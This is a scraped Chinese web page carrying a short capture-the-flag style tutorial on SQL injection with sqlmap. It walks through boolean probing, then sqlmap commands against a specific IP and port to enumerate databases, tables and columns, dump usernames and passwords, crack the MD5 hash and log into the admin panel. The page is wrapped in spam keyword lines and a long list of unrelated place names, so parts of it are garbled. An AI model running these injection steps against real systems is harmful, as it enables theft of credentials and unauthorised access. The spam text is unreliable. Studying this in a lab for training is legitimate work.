婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > sqlmap注入圖文詳解

sqlmap注入圖文詳解

熱門標簽:大眾點評星級酒店地圖標注 云南電商智能外呼系統價格 拉卡拉外呼系統 高清地圖標注道路 臨清電話機器人 智能外呼系統復位 話務外呼系統怎么樣 外東北地圖標注 400電話可以辦理嗎

1.發現此網址可能存在sql注入漏洞,我們進行sql盲注入測試一下是否存在漏洞。

地址欄輸入 and 1=1 發現頁面正常顯示。


再次輸入and 1=2 頁面出現錯誤,說明該頁面可能存在sql注入漏洞


2.現在拿出我們的kali工具,sqlmap進行注入測試。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs


3.可以看到存在注入漏洞,掃到了5個數據庫。要獲取管理員用戶密碼,我們可以先從stormgroup注入。查看stormgroup這個數據庫存在的表單

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables


4.接下來查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns


5.上一步可以看到,name,password 是不是很熟悉。ok接下來我們開始獲取這兩列的數據。


6.可以看到password是經過md5加密,接下來我們把他解密。這里推薦給大家我自己收集的多種解密網址:解密網址大全點擊這里


7.now! 密碼已經呈現在我們眼前!!!!找到后臺地址進行登錄。


8.END 登錄成功,拿到flag,提交。Gameover !

總結

本篇文章就到這里了,希望能給你帶來幫助,也希望您能夠多多關注腳本之家的更多內容!

您可能感興趣的文章:
  • MyBatis 中 SqlMapConfig 配置文件詳解
  • Windows下Sqlmap環境安裝教程詳解
  • MyBatis直接執行SQL的工具SqlMapper
  • Mybatis中SqlMapper配置的擴展與應用詳細介紹(1)
  • 使用XSD校驗Mybatis的SqlMapper配置文件的方法(2)

標簽:阿里 福州 溫州 三明 定西 揚州 無錫 山西

巨人網絡通訊聲明:本文標題《sqlmap注入圖文詳解》,本文關鍵詞  sqlmap,注入,圖文,詳解,sqlmap,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《sqlmap注入圖文詳解》相關的同類信息!
  • 本頁收集關于sqlmap注入圖文詳解的相關信息資訊供網民參考!
  • 推薦文章
    主站蜘蛛池模板: 霍州市| 阜新市| 汉中市| 崇礼县| 遂平县| 肥东县| 虞城县| 望谟县| 明星| 冕宁县| 南康市| 改则县| 特克斯县| 安国市| 宜宾市| 昌邑市| 开封县| 沙坪坝区| 将乐县| 寻乌县| 偏关县| 新丰县| 革吉县| 清水河县| 肇源县| 永新县| 丰镇市| 四会市| 周口市| 鹰潭市| 常山县| 锡林浩特市| 嘉禾县| 浠水县| 当涂县| 鸡西市| 乐清市| 金乡县| 阳高县| 武汉市| 赫章县|